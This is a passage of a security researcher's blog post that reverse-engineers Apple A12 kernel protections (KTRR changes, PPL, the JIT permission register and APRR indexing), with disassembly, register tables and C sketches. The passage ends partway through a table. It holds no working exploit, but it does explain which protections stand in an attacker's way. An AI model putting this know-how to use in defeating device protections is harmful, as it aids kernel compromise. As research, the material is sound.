APRR
phoaxy, 08. Aug 2019

Of Apple hardware secrets.

Introduction
Almost a year ago I did a write-up on KTRR, first introduced in Apple's A10 chip series. Over the course of the last year, there has been a good bit of talk as well as confusion about the new mitigations shipped with Apple's A12. One big change, PAC, has already been torn down in detail by Brandon Azad, so I'm gonna leave that out here. What's left to cover is more than just APRR, but APRR is certainly the biggest chunk, hence the title of this post. The people who attended TyphoonCon down in Seoul this year already got to see this research at an earlier stage - everyone else can get the slides here. On a separate note, Apple's Head of Security Engineering Ivan Krstić returns to BlackHat US this year with a talk titled "Behind the scenes of iOS and Mac Security". The bits about iOS 13 sure sound interesting, but this bit of the abstract caught my eye:

    We will also discuss previously-undisclosed VM permission and page protection technologies that are part of our overall iOS code integrity architecture.

Let's see if we can change this "previously-undisclosed" status, shall we? :P

KTRR amended
If you've read my KTRR post and poked a bit at any A12 kernel, chances are something caught your attention: __LAST.__pinst lost a lot of instructions.
Here's the entirety of __LAST.__pinst on A11:

0xfffffff007630000 202018d5 msr ttbr1_el1, x0
0xfffffff007630004 c0035fd6 ret
0xfffffff007630008 00c018d5 msr vbar_el1, x0
0xfffffff00763000c c0035fd6 ret
0xfffffff007630010 402018d5 msr tcr_el1, x0
0xfffffff007630014 c0035fd6 ret
0xfffffff007630018 001018d5 msr sctlr_el1, x0
0xfffffff00763001c c0035fd6 ret
0xfffffff007630020 bf4100d5 msr spsel, 1
0xfffffff007630024 c0035fd6 ret
0xfffffff007630028 00f21cd5 msr s3_4_c15_c2_0, x0
0xfffffff00763002c c0035fd6 ret
0xfffffff007630030 20f21cd5 msr s3_4_c15_c2_1, x0
0xfffffff007630034 c0035fd6 ret
0xfffffff007630038 c0f21cd5 msr s3_4_c15_c2_6, x0
0xfffffff00763003c c0035fd6 ret
And here on A12:

0xfffffff008edc000 bf4100d5 msr spsel, 1
0xfffffff008edc004 c0035fd6 ret
0xfffffff008edc008 00f21cd5 msr s3_4_c15_c2_0, x0
0xfffffff008edc00c c0035fd6 ret
0xfffffff008edc010 20f21cd5 msr s3_4_c15_c2_1, x0
0xfffffff008edc014 c0035fd6 ret
0xfffffff008edc018 c0f21cd5 msr s3_4_c15_c2_6, x0
0xfffffff008edc01c c0035fd6 ret
These were the instructions that were supposed to exist nowhere else in the kernel, so that they wouldn't be executable after reset. But sure enough, if you go looking for the missing ones now, you'll find them scattered all throughout the kernel, apparently entirely unprotected. But while Apple is scatterbrained at times, they're not that scatterbrained[citation needed]. The thing is, when you try and jump to any instruction writing to ttbr1_el1, vbar_el1 or tcr_el1, this happens:

panic(cpu 0 caller 0xfffffff01dd79b84): "Undefined kernel instruction: pc=0xfffffff01dbd8084 instr=d518c000\n"
Debugger message: panic
Memory ID: 0xff
OS version: 16A405
Kernel version: Darwin Kernel Version 18.0.0: Tue Aug 14 22:07:18 PDT 2018; root:xnu-4903.202.2~1/RELEASE_ARM64_T8020
Kernel UUID: BEFBC911-B1BC-3553-B7EA-1ECE60169886
iBoot version: iBoot-4513.200.297
secure boot?: YES
Paniclog version: 10
Kernel slide: 0x0000000016200000
Kernel text base: 0xfffffff01d204000
Epoch Time: sec usec
 Boot : 0x5cc4e1ec 0x000c74d9
 Sleep : 0x00000000 0x00000000
 Wake : 0x00000000 0x00000000
 Calendar: 0x5cc4e21d 0x000d3015
What's that faulting instruction d518c000, you ask? Bad news:

$ rasm2 -aarm -b64 -D $(hexswap d518c000)
0x00000000 4 00c018d5 msr vbar_el1, x0
It's the very instruction we wanted to run.

That makes a lot of sense when you think about it from a chip designer's point of view though. The reason why Apple no longer stuffs these instructions under __LAST.__pinst is that they've upgraded their silicon to provide a much stronger guarantee, one that holds up even if they leave some instructions in by mistake, or if you can pull some cache magic to inject some of your own: they just flip a switch and make the instructions undefined altogether.

And looking at set_tcr or set_mmu_ttb_alternate tells us exactly where this switch is (you can find them by just searching for the instructions):

;-- set_tcr
0xfffffff0079d8c18 014040ca eor x1, x0, x0, lsr 16
0xfffffff0079d8c1c 21144092 and x1, x1, 0x3f
0xfffffff0079d8c20 e10000b5 cbnz x1, 0xfffffff0079d8c3c
0xfffffff0079d8c24 41f13cd5 mrs x1, s3_4_c15_c1_2
0xfffffff0079d8c28 21007e92 and x1, x1, 4
0xfffffff0079d8c2c 410100b5 cbnz x1, 0xfffffff0079d8c54
0xfffffff0079d8c30 402018d5 msr tcr_el1, x0
0xfffffff0079d8c34 df3f03d5 isb
0xfffffff0079d8c38 c0035fd6 ret
;-- set_mmu_ttb_alternate
0xfffffff0079d8bd0 9f3f03d5 dsb sy
0xfffffff0079d8bd4 41f13cd5 mrs x1, s3_4_c15_c1_2
0xfffffff0079d8bd8 21007c92 and x1, x1, 0x10
0xfffffff0079d8bdc c10300b5 cbnz x1, 0xfffffff0079d8c54
0xfffffff0079d8be0 202018d5 msr ttbr1_el1, x0
0xfffffff0079d8be4 df3f03d5 isb
0xfffffff0079d8be8 c0035fd6 ret
Both contain something that is not in public XNU sources, namely a read from the register s3_4_c15_c1_2, and a jump away if certain bits are set. The place it jumps to calls panic with the string "attempt to set locked register", which is a pretty clear message. Searching for further accesses to s3_4_c15_c1_2 brings us to this snippet, which is run as part of the reset code:

0xfffffff0079d8bfc df3f03d5 isb
0xfffffff0079d8c00 0100f0d2 mov x1, -0x8000000000000000
0xfffffff0079d8c04 a00280d2 mov x0, 0x15
0xfffffff0079d8c08 000001aa orr x0, x0, x1
0xfffffff0079d8c0c 40f11cd5 msr s3_4_c15_c1_2, x0
0xfffffff0079d8c10 df3f03d5 isb
0xfffffff0079d8c14 c0035fd6 ret
So it gets the value 0x8000000000000015. The code above tells us that 0x4 is for tcr_el1 and 0x10 for ttbr1_el1, but what about the other two? The code setting vbar_el1 contains no register check, but I'm assuming it's controlled by bit 0x1. As for bit 63, I'm fairly confident that serves a slightly more… fine-grained purpose. Because there's one register that used to be under __LAST.__pinst that we haven't talked about yet: sctlr_el1.
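
Put together, the register layout would look something like this (a sketch; the bit names are my own, and only the tcr/ttbr bits are actually confirmed by the checks above):

#include <stdint.h>

/* Bits of s3_4_c15_c1_2, as far as this post can tell. */
#define VMSA_LOCK_VBAR_EL1  (1ULL <<  0) /* assumed: makes writes to vbar_el1 undefined */
#define VMSA_LOCK_TCR_EL1   (1ULL <<  2) /* confirmed: checked in set_tcr */
#define VMSA_LOCK_TTBR1_EL1 (1ULL <<  4) /* confirmed: checked in set_mmu_ttb_alternate */
#define VMSA_LOCK_PARTIAL   (1ULL << 63) /* assumed: locks parts of sctlr_el1 and this register itself */

/* The value written as part of the reset code: 0x8000000000000015 */
static const uint64_t vmsa_lockdown_reset = VMSA_LOCK_PARTIAL
                                          | VMSA_LOCK_TTBR1_EL1
                                          | VMSA_LOCK_TCR_EL1
                                          | VMSA_LOCK_VBAR_EL1;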

The thing with sctlr_el1 is that the instruction writing to it is not made undefined. In fact, the register is actively written to by the exception handlers if coming from EL0:

0xfffffff0079cf304 001038d5 mrs x0, sctlr_el1
0xfffffff0079cf308 c000f837 tbnz w0, 0x1f, 0xfffffff0079cf320
0xfffffff0079cf30c 000061b2 orr x0, x0, 0x80000000
0xfffffff0079cf310 000065b2 orr x0, x0, 0x8000000
0xfffffff0079cf314 000073b2 orr x0, x0, 0x2000
0xfffffff0079cf318 001018d5 msr sctlr_el1, x0
0xfffffff0079cf31c df3f03d5 isb
The tbnz there is a bit of a sloppy check, but under the assumption of kernel integrity it's all fine. Basically the kernel checks for the EnIA bit here (which controls whether pacia instructions are no-ops), and if not set, sets bits EnIA, EnDA and EnDB. What's happening here is that three of the five PAC keys are disabled for userland apps that are not arm64e, because those would otherwise crash horribly (the IB key is not disabled because it's used for stack frames, which are local to each function and thus not an issue). These keys need to be re-enabled on entry to the kernel, and so sctlr_el1 actually has to be writeable. This would make it a very interesting target since it controls the MMU, which, if turned off, would allow us to run shellcode at EL1. But of course it's not that simple.
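
Rendered as C, that exception-entry logic looks roughly like this (a sketch; the bit positions are the architectural SCTLR_EL1 ones from ARMv8.3-PAuth):

#include <stdint.h>

#define SCTLR_EnIA (1ULL << 31) /* IA key: pacia*, autia* */
#define SCTLR_EnDA (1ULL << 27) /* DA key: pacda, autda   */
#define SCTLR_EnDB (1ULL << 13) /* DB key: pacdb, autdb   */

uint64_t sctlr_on_kernel_entry(uint64_t sctlr)
{
    /* The tbnz above: if EnIA is already set, we didn't come from a
     * non-arm64e process, so there's nothing to re-enable. */
    if (!(sctlr & SCTLR_EnIA)) {
        sctlr |= SCTLR_EnIA | SCTLR_EnDA | SCTLR_EnDB;
        /* the real code follows this with "msr sctlr_el1, x0" and an isb */
    }
    return sctlr;
}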

Even if you jump to an instruction that writes to sctlr_el1 and make it unset bit 0, which should turn off the MMU - it will simply not turn off. This is where (I'm wildly assuming) bit 63 from the s3_4_c15_c1_2 register comes in. It appears that certain bits of sctlr_el1 are locked down, while others remain writeable. I haven't gone on to test exactly which bits these are, because for one the available sctlr_el1 gadgets are very uncomfortable to use, and for two we know that the PAC bits are writeable, the M bit is not, and the rest of the bits are, quite frankly, not of much interest to me.

Of more interest to me was the question of whether s3_4_c15_c1_2 itself remains writeable and could be used to unlock these registers again. To which the answer is of course also no.
The instructions writing to s3_4_c15_c1_2 are not themselves made undefined, but as with parts of sctlr_el1, the register value will simply not change anymore. I'm assuming this is also controlled by bit 63.

Now, as might be obvious, my research in this area hasn't gone into great detail so far. I hope to eventually find the time to revisit the register in question, and update this post accordingly.
It's clear though that the register's purpose is to lock down other registers. Wanting to be more specific than just "the lockdown register", I skimmed the ARMv8 spec for a place where these registers are grouped together, but the narrowest group encompassing all of ttbr1_el1, tcr_el1, sctlr_el1 and vbar_el1 is the VMSA (Virtual Memory System Architecture), so for lack of a better name I propose that s3_4_c15_c1_2 be called VMSA_LOCKDOWN_EL1.

As a side note, a register at the same encoding seems to exist on chips older than the A12, but it exhibits entirely different behaviour and does not seem to affect VMSA registers at all.
And I feel like I should also note that there is another register introduced with the A12: s3_4_c15_c2_5. The numbering puts it just above the other three KTRR registers:

0xfffffff0079d410c 71f21cd5 msr s3_4_c15_c2_3, x17
0xfffffff0079d4110 93f21cd5 msr s3_4_c15_c2_4, x19
0xfffffff0079d4114 510280d2 mov x17, 0x12
0xfffffff0079d4118 b1f21cd5 msr s3_4_c15_c2_5, x17
0xfffffff0079d411c 310080d2 mov x17, 1
0xfffffff0079d4120 51f21cd5 msr s3_4_c15_c2_2, x17
Being written to right in the middle of the KTRR lockdown sequence suggests it is part of KTRR, but I have to admit I have no idea what it does, or what the value 0x12 written to it means.

A thing called PPL
The VMSA_LOCKDOWN_EL1 register from the last section seems to have neither gotten any public attention, nor affected exploitation of the A12. What got a lot more attention, of course, was PAC. Being part of the ARMv8 spec, it was fairly public, and seems to have been treated as the big new thing on the A12, security-wise. And in the beginning it seemed really strong, but after Brandon Azad discovered a design flaw or two, it doesn't really hold up to a motivated attacker anymore. But the A12 came with yet another security… thing - and this one, in my humble opinion, is the real killer: PPL.

Basically, A12 kernels have a bunch of new segments:

LC 03: LC_SEGMENT_64 Mem: 0xfffffff008eb4000-0xfffffff008ec8000 __PPLTEXT
LC 04: LC_SEGMENT_64 Mem: 0xfffffff008ec8000-0xfffffff008ed8000 __PPLTRAMP
LC 05: LC_SEGMENT_64 Mem: 0xfffffff008ed8000-0xfffffff008edc000 __PPLDATA_CONST
LC 07: LC_SEGMENT_64 Mem: 0xfffffff008ee0000-0xfffffff008ee4000 __PPLDATA
Of course Apple won't tell us what the acronym "PPL" stands for (~anyone at BlackHat willing to annoy Ivan over this? :P~ UPDATE: it stands for "Page Protection Layer"!), but that doesn't stop us from taking it apart.

Anyone doing post-exploitation on A12 will undoubtedly have come across PPL already, because a bunch of memory patches that used to work just fine on A11 and earlier (namely trust cache injection and page table patches) make the A12 kernel panic with a kernel data abort (i.e. insufficient memory permissions). The thing is though, the kernel can definitely still write to that memory somehow - and if you try and track down the code that does so, you'll find that all such accesses happen from inside __PPLTEXT. It would appear as though that code was "privileged" somehow - but of course you can't just invoke it, since that will also panic, this time with an instruction fetch abort. Of course you can then go track down the code that calls into __PPLTEXT, which will reveal that all such invocations go through __PPLTRAMP.

At this point, there are two areas of interest one can dive into:

1. What kind of code exists in PPL, what parts of it are exposed through the trampoline, and how you can invoke them.
2. How this "privileged mode" works, what the underlying hardware primitives are, and what makes the PPL segments so special.

Point 1 has already been covered in a detailed write-up by Jonathan Levin, which I encourage you to read if you want to know more about that. The gist of it is that there are a bunch of "interesting things" such as page tables, trust caches and more (again, see Jonathan's post) that are now only accessible in "privileged mode", and thus remain protected even in the face of an attacker with "normal" kernel rwx. That might seem like adding just another layer to be hacked, but you'll find that the reduction in attack surface is actually huge when you start counting pages. In the iPhone XR's 12.0.1 kernel (random example because I had that one handy), there are 1339 pages in __TEXT_EXEC but a mere 5 pages in __PPLTEXT. Here's a visualisation of that:

[Image: PPL vs TEXT_EXEC]

Page tables and equally critical things had been freely (and needlessly!) accessible from that entire red part, when the green part was all that really required such access, so it only makes sense to lock that down. In addition, locking down page tables can foil the plans of some newbie hacker who thought he was really smart once upon a time:

[Image: My genius tweets]

So far so good for point 1 above, but point 2 is what I'm really here for. This is something that has gotten zero public mention, and I was surprised to learn that barely anyone I know seems to have researched this in private either (granted, it's not required for exploitation, but I consider it interesting nevertheless).

Going about this logically, there will have to be two parts that make up this privileged mode:

1. Some switch that is flipped on entry to and exit from __PPLTEXT.
2. Some attribute that makes the __PPL* segments stand out from the rest.

The former is found in __PPLTRAMP, right at the top of the entry/exit routines:

0xfffffff008ecbfe0 34423bd5 mrs x20, daif
0xfffffff008ecbfe4 df4703d5 msr daifset, 7
0xfffffff008ecbfe8 ae8ae8f2 movk x14, 0x4455, lsl 48
0xfffffff008ecbfec ae8ac8f2 movk x14, 0x4455, lsl 32
0xfffffff008ecbff0 ce8cacf2 movk x14, 0x6466, lsl 16
0xfffffff008ecbff4 eece8cf2 movk x14, 0x6677
0xfffffff008ecbff8 2ef21cd5 msr s3_4_c15_c2_1, x14
0xfffffff008ecbffc df3f03d5 isb
0xfffffff008ecc000 df4703d5 msr daifset, 7
0xfffffff008ecc004 ae8ae8f2 movk x14, 0x4455, lsl 48
0xfffffff008ecc008 ae8ac8f2 movk x14, 0x4455, lsl 32
0xfffffff008ecc00c ce8cacf2 movk x14, 0x6466, lsl 16
0xfffffff008ecc010 eece8cf2 movk x14, 0x6677
0xfffffff008ecc014 35f23cd5 mrs x21, s3_4_c15_c2_1
0xfffffff008ecc018 df0115eb cmp x14, x21
0xfffffff008ecc01c e1050054 b.ne 0xfffffff008ecc0d8

0xfffffff008ed3fec ae8ae8f2 movk x14, 0x4455, lsl 48
0xfffffff008ed3ff0 8e8ac8f2 movk x14, 0x4454, lsl 32
0xfffffff008ed3ff4 ce8cacf2 movk x14, 0x6466, lsl 16
0xfffffff008ed3ff8 ee8e8cf2 movk x14, 0x6477
0xfffffff008ed3ffc 2ef21cd5 msr s3_4_c15_c2_1, x14
0xfffffff008ed4000 df3f03d5 isb
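
To make the flow of the entry gadget clearer, here's a rough C-with-inline-assembly rendition (a sketch only; register allocation, the daif restore and the actual panic path are simplified away):

#include <stdint.h>

#define APRR1_PPL_ENTRY 0x4455445564666677ULL
#define APRR1_PPL_EXIT  0x4455445464666477ULL

static uint64_t ppl_enter_sketch(void)
{
    uint64_t old_daif, check;
    __asm__ volatile("mrs %0, daif" : "=r"(old_daif)); /* save interrupt state */
    __asm__ volatile("msr daifset, #7");               /* mask interrupts */
    /* flip APRR1 to the privileged value */
    __asm__ volatile("msr s3_4_c15_c2_1, %0" :: "r"(APRR1_PPL_ENTRY));
    __asm__ volatile("isb");
    /* re-materialise the constant and verify - the anti-ROP check */
    __asm__ volatile("mrs %0, s3_4_c15_c2_1" : "=r"(check));
    if (check != APRR1_PPL_ENTRY)
        __builtin_trap(); /* the real code branches off to a panic here */
    return old_daif;      /* restored before jumping into __PPLTEXT */
}

The exit gadget is the same idea in reverse: write APRR1_PPL_EXIT, isb, and return to normal code.
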
And the latter is found in page tables (the permissions shown here are kernel/user - note that these permissions not only apply to the PPL segments, but also to data dynamically allocated by PPL):

[Image: PPL page tables]

Obviously the PPL pages don't really have these permissions - that's just what the page table entries say. The real permissions look like this in "unprivileged"/normal mode:

[Image: PPL page tables unpriv]

And get flipped to this in "privileged"/PPL mode:

[Image: PPL page tables priv]

Before we can dive into how that works though, we have to look at something else. Something that, too, has not been publicly torn down. Something that, too, has to do with memory access permissions.

A new JIT on the block
This tale starts, because how could it be any different, with Ivan Krstić's 2016 BlackHat talk. In the part about JIT, he has helpful graphics showing how JIT was implemented up to and including iOS 9 (images blatantly stolen from his slides):

[Image: not da wae]

And how this would change with iOS 10:

[Image: da wae]

(For more info on that, go check out his talk - going forward here, I assume you know how that works.)

That was nice and well, but just a year later with the release of the A11, Apple moved back to a unified JIT region - with a little caveat. Rather than being fully RWX, a proprietary system register would control whether the region was currently rw- or r-x, and all JIT-emitting code would configure that register accordingly. One such piece of JIT-emitting code looks as follows (taken from the XR's 12.1 JSC, again simply because I had that one handy):

0x188347298 002298f2 movk x0, 0xc110
0x18834729c e0ffbff2 movk x0, 0xffff, lsl 16
0x1883472a0 e001c0f2 movk x0, 0xf, lsl 32
0x1883472a4 0000e0f2 movk x0, 0, lsl 48
0x1883472a8 000040f9 ldr x0, [x0]
0x1883472ac e0f21cd5 msr s3_4_c15_c2_7, x0
0x1883472b0 df3f03d5 isb
0x1883472b4 012298f2 movk x1, 0xc110
0x1883472b8 e1ffbff2 movk x1, 0xffff, lsl 16
0x1883472bc e101c0f2 movk x1, 0xf, lsl 32
0x1883472c0 0100e0f2 movk x1, 0, lsl 48
0x1883472c4 280040f9 ldr x8, [x1]
0x1883472c8 e9f23cd5 mrs x9, s3_4_c15_c2_7
0x1883472cc 1f0109eb cmp x8, x9
0x1883472d0 c1020054 b.ne 0x188347328
0x1883472d4 e00315aa mov x0, x21
0x1883472d8 e10314aa mov x1, x20
0x1883472dc e20313aa mov x2, x19
0x1883472e0 19a82b94 bl sym.imp._ZN3JSC4YarrL22createCharacterClass98Ev
0x1883472e4 c8024039 ldrb w8, [x22]
0x1883472e8 08020034 cbz w8, 0x188347328
0x1883472ec 002398f2 movk x0, 0xc118
0x1883472f0 e0ffbff2 movk x0, 0xffff, lsl 16
0x1883472f4 e001c0f2 movk x0, 0xf, lsl 32
0x1883472f8 0000e0f2 movk x0, 0, lsl 48
0x1883472fc 000040f9 ldr x0, [x0]
0x188347300 e0f21cd5 msr s3_4_c15_c2_7, x0
0x188347304 df3f03d5 isb
0x188347308 012398f2 movk x1, 0xc118
0x18834730c e1ffbff2 movk x1, 0xffff, lsl 16
0x188347310 e101c0f2 movk x1, 0xf, lsl 32
0x188347314 0100e0f2 movk x1, 0, lsl 48
0x188347318 280040f9 ldr x8, [x1]
0x18834731c e9f23cd5 mrs x9, s3_4_c15_c2_7
0x188347320 1f0109eb cmp x8, x9
0x188347324 60020054 b.eq 0x188347370
0x188347328 200020d4 brk 1
So the system register in question is s3_4_c15_c2_7, and it gets its values from the hardcoded addresses 0xfffffc110/8 - which are on the "commpage", outside the range in which userland code is allowed to map memory. Those values are set up by the kernel in commpage_populate, but obviously the parts we care about are once again not in public XNU sources. You can find them in assembly though by looking for xrefs to the string "commpage cpus==0", and then far down the function referencing that you'll see something like this:

0xfffffff007b85390 caee8ed2 mov x10, 0x7776
0xfffffff007b85394 0a22a2f2 movk x10, 0x1110, lsl 16
0xfffffff007b85398 eacecef2 movk x10, 0x7677, lsl 32
0xfffffff007b8539c 4a46e6f2 movk x10, 0x3232, lsl 48
0xfffffff007b853a0 ea038a9a csel x10, xzr, x10, eq
0xfffffff007b853a4 cbee8ed2 mov x11, 0x7776
0xfffffff007b853a8 0b42a2f2 movk x11, 0x1210, lsl 16
0xfffffff007b853ac ebcecef2 movk x11, 0x7677, lsl 32
0xfffffff007b853b0 4b46e6f2 movk x11, 0x3232, lsl 48
0xfffffff007b853b4 eb038b9a csel x11, xzr, x11, eq
0xfffffff007b853b8 28310439 strb w8, [x9, 0x10c]
0xfffffff007b853bc 88b243f9 ldr x8, [x20, 0x760]
0xfffffff007b853c0 0a8900f9 str x10, [x8, 0x110]
0xfffffff007b853c4 88b243f9 ldr x8, [x20, 0x760]
0xfffffff007b853c8 0b8d00f9 str x11, [x8, 0x118]
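
From the constants built here we can tell that 0xfffffc110 holds the rw- value and 0xfffffc118 the r-x one, so what JSC does boils down to the following sketch (the function and macro names are made up for illustration):

#include <stdint.h>

#define COMMPAGE_APRR_JIT_RW ((volatile uint64_t *)0xfffffc110ULL) /* 0x3232767711107776 */
#define COMMPAGE_APRR_JIT_RX ((volatile uint64_t *)0xfffffc118ULL) /* 0x3232767712107776 */

static void jit_region_set_writeable(int writeable)
{
    uint64_t val = *(writeable ? COMMPAGE_APRR_JIT_RW : COMMPAGE_APRR_JIT_RX);
    __asm__ volatile("msr s3_4_c15_c2_7, %0\n"
                     "isb"
                     :: "r"(val));
    /* JSC then re-reads the commpage value and compares it against the
     * register, hitting a brk on mismatch - see the listing above. */
}
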
At this point, the A11 JIT and A12 PPL look kinda similar.
As for how both of them work and what gives it away, that brings us to the punch line of this post:

Enter APRR
Before the release of the A12, there were rumours about "userland KTRR" coming, and that being called "APRR". That's not what happened, but let's write down what we already know:

- PPL page tables are weirdly missing the UXN bit (which would make them executable under a standard ARMv8.* implementation).
- Entry and exit from PPL changes s3_4_c15_c2_1 to 0x4455445564666677/0x4455445464666477.
- Entry and exit from JIT-emitting code changes s3_4_c15_c2_7 to 0x3232767711107776/0x3232767712107776.

Pretty much the only speculation I've heard on this matter is that Apple has simply repurposed the UXN page table bit somehow. On a technical level that is not true, but it's an interesting notion that we'll get back to later. As for the register values, everyone who talked about this simply treated them as magical constants, but here's the first clue: all digits in these values are between 0x0 and 0x7, and none are between 0x8 and 0xf. That would make it either an odd choice or a big coincidence if they were just random constants.

The second clue is the encoding space in which these registers are located: s3_4_c15_c2_*. Not only are these two registers in there, but so are the KTRR registers, as well as this other register we found on the A12 that gets 0x12 written to it. This leaves us with:

Register         Note
s3_4_c15_c2_0    ???
s3_4_c15_c2_1    Used by PPL
s3_4_c15_c2_2    KTRR_LOCK_EL1
s3_4_c15_c2_3    KTRR_LOWER_EL1
s3_4_c15_c2_4    KTRR_UPPER_EL1
s3_4_c15_c2_5    Gets value 0x12 on A12
s3_4_c15_c2_6    ???
s3_4_c15_c2_7    Used by JIT, EL0-accessible

That means there are two registers we haven't seen yet - let's keep an eye out for those, shall we? Also, from here on out I'll be referring to these registers simply by their last digit for brevity (e.g. as in "registers 0 and 6 are the ones we have yet to see").

Alright, how do we find out more about APRR? Well, we could simply search for instructions operating on these registers, but before we do that, let me introduce you to this high-tech hacking tool called strings…

$ strings kernel | fgrep APRR
"%s: invalid APRR index, " "start=%p, end=%p, aprr_index=%u, expected_index=%u"
"pmap_page_protect: modifying an APRR mapping pte_p=%p pmap=%p prot=%d options=%u, pv_h=%p, pveh_p=%p, pve_p=%p, pte=0x%llx, tmplate=0x%llx, va=0x%llx ppnum: 0x%x"
"pmap_page_protect: creating an APRR mapping pte_p=%p pmap=%p prot=%d options=%u, pv_h=%p, pveh_p=%p, pve_p=%p, pte=0x%llx, tmplate=0x%llx, va=0x%llx ppnum: 0x%x"
"Unsupported APRR index %llu for pte 0x%llx"
Not bad, this tells us quite a bit. For one, it seems that pmap_page_protect deals with APRR, so we'll go check that out in a second. But for two, something a bit more inconspicuous: it sounds like APRR has indices. With that in mind, let's dive into some assembly:

0xfffffff008eb8624 0bf23cd5 mrs x11, s3_4_c15_c2_0
0xfffffff008eb8628 2af23cd5 mrs x10, s3_4_c15_c2_1
0xfffffff008eb862c c8f23cd5 mrs x8, s3_4_c15_c2_6
0xfffffff008eb8630 49ff44d3 lsr x9, x26, 4
0xfffffff008eb8634 29057e92 and x9, x9, 0xc
0xfffffff008eb8638 49d774b3 bfxil x9, x26, 0x34, 2
0xfffffff008eb863c 49db76b3 bfxil x9, x26, 0x36, 1
0xfffffff008eb8640 2cf57ed3 lsl x12, x9, 2
0xfffffff008eb8644 edc300b2 orr x13, xzr, 0x101010101010101
0xfffffff008eb8648 edecacf2 movk x13, 0x6767, lsl 16
0xfffffff008eb864c ada8e8f2 movk x13, 0x4545, lsl 48
0xfffffff008eb8650 6d010dca eor x13, x11, x13
0xfffffff008eb8654 eb0b0032 orr w11, wzr, 7
0xfffffff008eb8658 6b21cc9a lsl x11, x11, x12
0xfffffff008eb865c 7f010dea tst x11, x13
0xfffffff008eb8660 81010054 b.ne 0xfffffff008eb8690
0xfffffff008eb8664 ecce8cd2 mov x12, 0x6677
0xfffffff008eb8668 ccccacf2 movk x12, 0x6666, lsl 16
0xfffffff008eb866c ac8ac8f2 movk x12, 0x4455, lsl 32
0xfffffff008eb8670 ac8ae8f2 movk x12, 0x4455, lsl 48
0xfffffff008eb8674 4a010cca eor x10, x10, x12
0xfffffff008eb8678 7f010aea tst x11, x10
0xfffffff008eb867c a1000054 b.ne 0xfffffff008eb8690
0xfffffff008eb8680 ea030032 orr w10, wzr, 1
0xfffffff008eb8684 4921c99a lsl x9, x10, x9
0xfffffff008eb8688 3f0108ea tst x9, x8
0xfffffff008eb868c 00020054 b.eq 0xfffffff008eb86cc
Lo and behold, there are those two system registers we just said we hadn't seen yet! (Though actually I lied - we've already seen them in __LAST.__pinst, that's just a bit moot since we have zero context there.)
What you're looking at is part of the pmap_page_protect_internal function (a part which is yet again not in public sources, obviously) that has been inlined into pmap_page_protect, with x26 being a TTE about to be entered into a page table.

So what's happening here? At the top we have the register reads, then we have some bit mashing, and finally a few branches to panic() if the resulting values are not zero. And it's the bit mashing we're interested in. Translated to C code it would probably look really ugly, but put into words, there are three simple actions (rendered as a C sketch below):

- The register values are XOR'ed with some constants (0x4545010167670101/0x4455445566666677).
- A 4-bit number is constructed from the TTE in the form <AP[2:1]>:<PXN>:<UXN>.
- The value 0x7 is left-shifted by four times that number, and used to mask the XOR'ed values.
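
Here's that sketch (the names are made up, and the exact branch targets are glossed over):

#include <stdint.h>

extern void panic(const char *msg); /* stand-in for the actual panic paths */

static uint64_t aprr_index(uint64_t tte)
{
    uint64_t ap  = (tte >> 6) & 0x3;  /* AP[2:1], TTE bits 7:6 */
    uint64_t pxn = (tte >> 53) & 0x1; /* PXN,     TTE bit 53   */
    uint64_t uxn = (tte >> 54) & 0x1; /* UXN,     TTE bit 54   */
    return (ap << 2) | (pxn << 1) | uxn;
}

static void aprr_check_sketch(uint64_t tte, uint64_t reg0, uint64_t reg1, uint64_t reg6)
{
    uint64_t idx = aprr_index(tte);
    /* registers 0 and 1: shift by idx*4, mask with 0x7 */
    if ((((reg0 ^ 0x4545010167670101ULL) >> (idx * 4)) & 0x7) != 0 ||
        (((reg1 ^ 0x4455445566666677ULL) >> (idx * 4)) & 0x7) != 0 ||
        /* register 6: 1-bit fields, as discussed below */
        ((reg6 >> idx) & 0x1) != 0)
    {
        panic("invalid APRR index"); /* one of the messages from the strings output */
    }
}
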
That last bullet point is particularly interesting, because it precisely describes the concept of register indexing. If you're not familiar with it, the ARMv8 Reference Manual has at least one good example I know of: MAIR_EL1, on page D13-3202:

[Image: MAIR_EL1]

Long story short, in translation table entries you have an AttrIndx field with 3 bits, i.e. values from 0x0 to 0x7. Those are then used to index the MAIR_EL1 register to get the Attr* fields. Since you have 8 fields in a 64-bit register, that makes each field 8 bits wide.

And that is precisely what's happening with APRR here, the only difference being that instead of a 3-bit index we have a 4-bit one, and hence registers 0 and 1 have 16 fields that are each 4 bits wide. We left out register 6 above, which is indexed a bit differently - the index itself is the same, but its fields seem to be just 1 bit wide rather than 4 (a nice property of both widths is that a field translates to exactly one digit in hexadecimal/binary respectively).
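
In code, both indexing schemes boil down to the same shift-and-mask pattern; a minimal sketch:

#include <stdint.h>

/* MAIR_EL1: 3-bit index, 8-bit fields */
static uint64_t mair_attr(uint64_t mair, unsigned attridx)
{
    return (mair >> (attridx * 8)) & 0xff;
}

/* APRR registers 0/1: 4-bit index, 4-bit fields */
static uint64_t aprr_field(uint64_t aprr, unsigned idx)
{
    return (aprr >> (idx * 4)) & 0xf;
}

/* APRR register 6: 4-bit index, 1-bit fields */
static uint64_t aprr_bit(uint64_t reg6, unsigned idx)
{
    return (reg6 >> idx) & 0x1;
}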

This tells us the register layout, but we still don't know the meaning of the individual fields. For that, it might be helpful to collect all values that are somehow used with these registers. Here's that collection:

Value description                Register 0           Register 1           Register 6           Register 7
XOR'ed in pmap_page_protect      0x4545010167670101   0x4455445566666677   -                    -
Assigned after CPU reset (A11)   0x4545010165670101/  0x4455445564666677   0b0000000000000000   0x3232767612107676
                                 0x4545010167670101
Assigned after CPU reset (A12)   0x4545010065670001/  0x4455445464666477/  0b0000000000000000   0x3232767712107776
                                 0x4545010067670001   0x4455445564666677
PPL entry (A12)                  -                    0x4455445564666677   -                    -
PPL exit (A12)                   -                    0x4455445464666477   -                    -
Process has JIT disabled (A11)   0x4545010165670101   -                    0b0000000001000000   -
Process has JIT enabled (A11)    0x4545010167670101   -                    0b0000000001000000   -
Process has JIT disabled (A12)   0x4545010065670001   -                    0b0000000001000000   -
Process has JIT enabled (A12)    0x4545010067670001   -                    0b0000000001000000   -
JIT region is rw-                -                    -                    -                    0x3232767711107776
JIT region is r-x                -                    -                    -                    0x3232767712107776
And then we can do something else: we can take all possible 4-bit indices 0x0 through 0xf, and write down what permissions each would normally give when used in a TTE.

Index   Kernel access   Userland access
0x0     rwx             --x
0x1     rwx             ---
0x2     rw-             --x
0x3     rw-             ---
0x4     rwx             rwx
0x5     rwx             rw-
0x6     rw-             rwx
0x7     rw-             rw-
0x8     r-x             --x
0x9     r-x             ---
0xa     r--             --x
0xb     r--             ---
0xc     r-x             r-x
0xd     r-x             r--
